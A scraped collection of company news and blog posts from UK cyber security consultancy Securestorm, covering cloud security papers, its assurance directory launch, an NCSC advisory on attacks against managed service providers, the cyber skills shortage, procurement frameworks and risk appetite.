As tech-UK Member organisation and industry experts, Securestorm directly worked with tech-UK and other industry members to discuss, research and build the cloud topic papers.

Securestorm's Tony Richards, CTO/CISO/Cyber and Cloud Security Strategist, was also involved in the event panel discussion on 24th April 2017 providing insights and answering audience questions on cloud security with relation to Government, Consumers and upcoming challenges such as Brexit and policy changes.

Securestorm are NCSC Certified Cyber Security Consultants with diversified interest in the Cloud Security domain working Public and Private sectors. With experience, knowledge and expertise Securestorm are actively working to champion Cloud Security best practices that enable Govt. & businesses to run more efficiently and cost effectively.

    Highlights from 'Building Trust in Cloud Session'

    Highlights from 'Building Trust in Cloud Session'

    Also launched is techUK’s “Cloud First. Policy Not Aspiration paper which focuses on the importance of the UK Government’s Cloud First policy being more than just an aspiration for ensuring effective public sector adoption and usage of cloud and how Government can become a loud and vocal cloud champion. The paper makes a number of recommendations that must be taken forward in order to build great trust in the security of cloud services and increase the adoption of cloud within the public sector. These recommendations and the importance of clear roles and responsibilities organisations for building greater trust and security in cloud computing across both the public and private sector and how to take forward tech-UK's work on this area.

    Access the Cloud papers here:

    About: Securestorm are dynamic cyber security experts that delivers practical advice with the aim of meeting and solving challenges across Cloud and Cyber Security domains. With a combination of experience, expertise and strategy, Securestorm offers guidance to clients across Public and Private sectors.
    Securestorm holds several accreditation, notably being NCSC Certified Cyber Security Consultancy, Crown Commercial Suppliers, and ISO:27001. Furthermore, Securestorm are also industry prominent for its proven delivery capabilities.







      SECURESTORM LAUNCHES Informed.online

    Securestorm Ltd., Cloud & Cyber Security Experts and UK National Cyber Security Centre (NCSC) Certified Cyber Security Consultancy have officially launched Informd.online.

    Informd.online is an online Common Technology Service directory for cloud services that have been audited and security assured by Securestorm against the UK National Cyber Security Centre’s (NCSC) Cloud Security Principles. In-line with the UK Governments ambition to reduce repetition and share security assurance information between government organisations, Government Security representatives can register for an Informd.online account to gain access to the detailed reports.

    Securestorm are NCSC certified for the specialist areas of Information Assurance Audit and Review, Risk Assessment and Risk Management and hold various cloud security credentials further backed up by great industry experience and delivery in the public and private sectors. 

    Informd.online has been developed for referencing assured technology services allowing for users to have an overview, access relevant information and thus make an informed decisions on the security status. Government Users can register for an Informd.online account, allowing access to the detailed, Cloud Security Principles Assurance Audit Reports.

    Easy Icon-Based Classifications

    Securestorm has designed the directory with custom icons using a traffic light labelling system for security assurance snapshot. Research has shown that the traffic light system has proven to be successful model for multiple sectors. Therefore, applying this principle Securestorm has mapped assurance levels (i.e. Assured, Not Assured, Weak Assurance and Not Applicable) to categories of importance covering core areas such as: Personal Data, Medical Data, Financial Data, as well as security functions such as: data location, protection of data in transit, legal jurisdiction, audit, identity and access control, and physical security.


    Friendly & Informative Layout

    Informd.online gives users a holistic overview of the services security right up front with detailed but easy to narrow down services information through our custom assurance icons.


    Readily Available Information

    Clicking on the relevant service allows for accessing general information about the service. Registered Government Account holders get access to a fully detailed and referenced Cloud Security Principles Assurance Audit Report.


                                  Security assurance icon explanation


    Users can navigate the services list and click on the relevant service after shortlisting based on our custom assurance icons

    Users can click on services to pull of descriptions and relevant links asscotiated

    Other Essential Resources from Securestorm

    For more information on our Informed.online, feel free to reach out to: enquiries@securestorm.com for support or queries. For access to other resources from Securestorm such as Digital Apps, Cloud and Cyber Security Guidance articles, Thought-Leaderships and Case-studies, visit www.securestorm.com or navigate our links below.


    You Are Only As Strong As Your Weakest Link… MSPs Under Cyber-Threats.


    You Are Only As Strong As Your Weakest Link… MSPs Under Cyber-Threats.

    The following news story is result of an uncovering report as presented by the NCSC:

    Advice on managing enterprise security published after major cyber campaign detected

    • Third parties who manage large organisations’ IT services attacked
    • NCSC leading investigation in partnership with Cyber Incident Response partners
    • Advice urges enterprise security teams to discuss risk with Managed Service Providers

    TARGETED expert advice aimed at Managed Service Providers and their customers has been published after a global cyber attack was uncovered by a multi-organisation collaboration led by the National Cyber Security Centre (NCSC).

    The attacks are against global Managed Service Providers (MSPs), which are third parties who help to manage large organisations’ IT infrastructure and services. MSPs are particularly attractive to attackers because they have privileged access to other organisations’ systems and data.

    Due to the incident affecting mainly larger organisations, the NCSC believes the risk of direct financial theft from individuals is unlikely.

    The attacks provide a reminder about the importance of organisations choosing and monitoring their outsourcing partners carefully, so the NCSC has posted a range of advice on their website about what people should be done to mitigate against risks.

    Ciaran Martin, CEO of the government’s National Cyber Security Centre Said:

    “This scale of hostile activity is significant and our intervention is aimed at giving the UK the ability to tackle this threat head-on by giving organisations the tools and information they need.

    “We always encourage enterprises to discuss this threat with their MSP, even if they have no reason to believe they have been affected. This incident should remind organisations that entire supply chains need to be managed and they cannot outsource their risk.

    “The response to this attack is an example of the new NCSC at work with our partners. It would not have been possible to uncover the scale and significance of this incident as quickly without our close partners in Cyber Incident Response (CIR) initiative, including PWC and BAE Systems.”

    The guidance reflects the technical advice and mitigation measures offered to U.K. industry and government departments on the Cyber-security Information Sharing Partnership (CISP) platform.

    Organisations who outsource IT infrastructure are recommended to have an open dialogue with their provider and to understand what model they use to manage your services. If their model is unsatisfactory, the organisation should demand that they change it immediately.

    The NCSC recommends that MSPs who are unwilling to work closely with customers or are unwilling to share information should be treated with extreme caution. They also advise that having an independent audit of your MSP is critical for security management – an organisation that neglects such monitoring is unlikely to ever be able to effectively manage the risk.

    The NCSC, which is part of GCHQ, is the UK’s technical authority on cyber security. The NCSC was opened by HM The Queen in February 2017 and provides a single, central body for cyber security at a national level. It manages national cyber security incidents, carries out real-time threat analysis and provides tailored sectoral advice. 

    The UK government is fully committed to defending against cyber threats and address the cyber skills gap to develop and grow talent. A five year National Cyber Security Strategy (NCSS) was announced in November 2016, supported by £1.9billion of transformational investment.

    Finding Reliable, Trusted & Assured Experts Through NCSC Seal Of Approval

    The NCSC, set up in October 2016, is part of GCHQ and amalgamates government agencies dealing with cyber security. The NCSC was set up to help protect our critical services from cyber attacks, managing major incidents and improve the underlying security of the UK Internet through technological improvement and advice to citizens and organisations. Their vision is to help make the UK the safest place to live and do business online. NCSC certification serves as seal of trust, assurance and reliability for procuring services.

    Certified Cyber Consultancies will have demonstrated to NCSC that they have;

    • a proven track record of delivering defined cyber security consultancy services
    • a level of cyber security expertise supported by professional requirements defined by NCSC
    • the relevant Certified Professional (CCP) qualifications

    And that they;

    • Manage consultancy engagements in accordance with industry good practice
    • Meet NCSC requirements for certified professional cyber services companies

    Certified Cyber Security Consultancies commit to:

    • Complying with a code of conduct (see Section III of the Professional Cyber Services Application form)
    • Maintaining their cyber security expertise


    Securestorm as an NCSC certified Cyber Security Consultancy, are 1 of 3 companies who specialize in IA Audit and Review. Securestorm can undertake the Independent Security Assurance Reviews and IA Audits of Managed Service Providers as advised by the NCSC in light of this new attack. Additionally, Securestorm are also certified to carry out Risk Assessment & Risk Management with experience across Central government, Digital services for Government, Wider Public Sector.



    UK faces dramatic cyber-security skills 'cliff edge' and is chronically under prepared for hacker attacks, study finds


    UK faces dramatic cyber-security skills 'cliff edge' and is chronically under prepared for hacker attacks, study finds

    "The study finds that only 12 per cent of the UK workforce is under the age of 35 and 53 per cent is over the age of 45"

    Tuesday’s survey follows a string of similar warnings and a slew of high-profile cyber-attacks that have cost companies both in terms of money and reputation Reuters

    A global survey of almost 20,000 security professionals across banks, governments and multinationals concludes that Britain is facing a cyber-security skills “cliff edge” and that companies are “chronically” under-prepared for attacks. 

    The survey, conducted by (ISC)² – a non-profit organisation that aims to educate people about the risks of being online – shows that the UK workforce is getting older which is exacerbating an already gaping cyber-security skills rift. 

    Only 12 per cent of the workforce is under the age of 35 and 53 per cent is over the age of 45, the study finds. 

    A mere 6 per cent of UK companies are recruiting graduates who would have the potential to plug the gap, and 66 per cent already face a cyber-security skills squeeze due to being unable to find qualified personnel. 

    The data also suggest that employers are largely refusing to hire and train inexperienced recruits. A whopping 93 per cent of UK companies that responded to the survey said that previous cyber-security experience is an important factor in their hiring decisions.

    The findings indicate that the skills deficit is already having an effect on British businesses.  

    Close to half of the UK companies questioned said that the shortfall of cyber-security personnel is having a significant impact on their customers. A similar proportion said that it is already causing security breaches. 

     “Industry is experiencing a talent shortfall because employers are too focused on recruiting people with existing cyber-security experience,” said Lucy Chaplin, a manager within KPMG’s financial services technology risk consulting group, commenting on the survey. 

    “[It] is like complaining that there’s a shortage of pilots but refusing to hire anyone who is not already an experienced pilot.” 

    Rob Partridge, head of BT’s Security Academy, said that “the findings confirm that graduates are being overlooked for cyber-security roles and it is now an economic and security imperative that we change this trend”.

    Tuesday’s survey follows a string of similar warnings and a slew of high-profile cyber-attacks that have cost companies both in terms of money and reputation. 

    Last month, a survey by job site Indeed showed that the chasm between supply and demand for cyber-security expertise is widening at an alarming rate. 


    Securestorm agrees with the Cyber Security shortage and deeply supports Cyber as part of educational curriculum and enhanced training and support networks to boost professionals levels as well as tackle skills shortage. This ethos is carried over in our approach of 'investing heavily in people'. We are on the lookout for bright and motivated talents to be join our progressive organisation and be inspired and grow within the Cyber Security Market. To visit our latest vacancies, visit: https://www.securestorm.com/careers/ or write to careers@securestorm.com for more information.


    Securestorm moves to Holborn...


    Securestorm moves to Holborn...


    Waterhouse Square is a large gothic building of red brick at 138-142 Holborn in the London Borough of Camden. This unique building is named after Alfred Waterhouse, the original architect of that building.


    The materials are vibrant red brick and terracotta, which give such a large building a hallucinatory quality. The style is unapologetically Victorian Gothic. The central court called 'Waterhouse Square', is accessible from Holborn and is entered from a smaller court under a wide, dramatic arch. Its effect is almost overwhelming.


    You can visit us here -
    WeWork, No. 3 Waterhouse Square
    138 Holborn
    EC1N 2SW
    Telephone: 0203 8655890



    Securestorm get on-board Cyber Security Services 2 Framework by NCSC & CCS

    1 Comment

    Securestorm get on-board Cyber Security Services 2 Framework by NCSC & CCS

    Securestorm bring Cyber Security Expertise to Cyber Security Services 2 Framework by NCSC & CCS to Meet Public-Sector Needs

    Securestorm, London based Cloud and Cyber security experts, Crown Commercial SuppliersCESG Certified and NCSC Certified Cyber Security Consultants are to bring their expertise and experience to the latest framework Cyber Security Services 2, a dynamic style agreement; with the specific aim of helping the public sector buy certified cyber security consultancy and services using an agile approach starting March 2017. 

    The Cyber Security Services 2 Framework is a collaboration between Crown Commercial Service (CCS) and the National Cyber Security Center (NCSC). This agreement provides a flexible and regulated route for central government and the wider public sector to procure NCSC certified cyber security services. NCSC are the UK government's National Technical Authority for Information Assurance. The agreement is based on the approach detailed in their Cyber Security Standard. The agreement is designed to work in an agile way, and iterated frequently to benefit buyers and suppliers. Cyber Security Services 2 aims to be the single, central route to market giving Central Government and Wider Public Sector buyers access to cyber security services, with the assurance of NCSC certification, technically and qualitatively. The services now included are;
            Lot 1: Cyber Consultancy (Risk Assessment, Risk Management, Security Architecture, Audit & Review, Incident Management)
            Lot 2: Penetration Testing
            Lot 3: Incident Response
            Lot 4: Tailored Evaluation

    By successfully getting on-board the new framework and being specialized in the Lot 1 offerings as an expert Cyber Consultancy certified by NCSC, Securestorm are experienced and equipped to meet the current needs of public sector organisations; whether they are looking to quickly respond to a cyber-attack, or to build long-term cyber resilience. This achievement follows another recent announcement of Securestorm being on-board, live and bringing expertise to the Digital Outcomes and Specialist Framework 2 on the Govt. marketplace starting February 2017. Read about this here.

    For recent case-studies visit: https://www.securestorm.com/cyber-security/ or email : enquiries@securestorm.com for questions or queries.

    1 Comment

       SECURESTORM on-board the ‘DIGITAL OUTCOMES & SPECIALIST 2’ framework

    SECURESTORM on-board the ‘DIGITAL OUTCOMES & SPECIALIST 2’ framework

    Securestorm, London based Cloud and Cyber security experts, Crown Commercial SuppliersCESG Certified and NCSC approved providers are to bring their expertise and experience to the new framework from the Cabinet Office and Government Digital Services - Digital Outcomes & Specialist framework from February 2017.

    Is defining your 'Risk Appetite' important?


    Is defining your 'Risk Appetite' important?

    Yes. But is it a simple decision whether to put your head inside a lion's mouth or not? Cyber security risk decisions aren't that straightforward.

    Ultimately, managing your cyber security risk is a trade-off between cost versus benefit. But it is a world away from being as simple as whether to put your head down a lion's mouth. Making a decision about cyber security risk is based on whether your organisation can manage the risk and therefore reduce it, or can afford to accept the risk and leave it alone for a while. The challenge is that not many organisations have the risk information, decision making process or risk management capabilities to do this on the fly without defining their risk appetite.  Do you know what your acceptable risk is?

    Many organisations work to reduce the risks then end up accepting the risks that are too difficult to reduce or they cannot see the value in reducing. The trouble is that if you don’t know what level of risk your organisation can tolerate, how can you decide on whether to accept them? You absolutely need a clear understanding on what is OK to accept and what is not? Everyone hopes to avoid them in the first place, then attempts to transfer them to be someone else’s problem. However, what is important is to the have the capability to reduce them to a level that you are willing to accept as an organisation.

    Many organisations are keen to understand how they will handle a cyber security attack and/or breach and are engaging cyber security organisations to review their business and technical environments. However, you get a better experience and answer to the question, “Do we really to spend this money on fixing this risk”, if you understand and know your organisation’s risk appetite. I’m not saying it’s a must, but in my opinion it’s a sign of real responsibility and maturity towards understanding your cyber security risks and threats. 

    Our Approach

    The process is pretty straight forward and it doesn’t have to be complex (complex = expensive). We believe in keeping things simple. You can spend lots of money trying to get a perfect answer only to change it 2 months later or you can get the fundamentals working properly and tweak to optimise it. There are 4 keys steps to follow:


    • Better decisions. Being able to make decisions easier and more accurately around risk treatment is important to be able to balance cost versus benefit when it comes to cyber risk.
    • Better risk management. Being able to manage risk more effectively by fully understanding your tolerances, thresholds and impact to assets.
    • Better financial management. Cost effective spending on cyber security controls and solutions is definitely important as many organisations are blindly spending money on cyber security without understand whether there is a benefit or they are reducing their risks. 

    If you would like to know more about this process of defining your Risk Appetite, or like us to run a free half day workshop on Risk Appetite Definition, please get in touch (details below)


    About Securestorm: We are a lean, agile and responsive cyber security consultancy that provides practical advice and intelligence with the aim to simplify the world of Cloud and Cyber Security. With a combination of innovation, expertise and strategy, Securestorm brings synergy to the industry.

    About the Writer: As the CEO, Mandeep is the chief planner behind Securestorm’s wheels responsible for steering and implementing all aspects of the sales, marketing and business development to ensure the company’s ongoing success and growth. As a veteran security advisor and business leader, Mandeep has managed multinational clients and is a well-known security expert in the industry who has built his career and reputation on solving clients’ information security, risk and compliance challenges. Mandeep is able to draw from his 20+ years of business and security experience across industry and regularly contributes industry insights, workshops and seminars in the IT security space. 

    Talk to us about this article: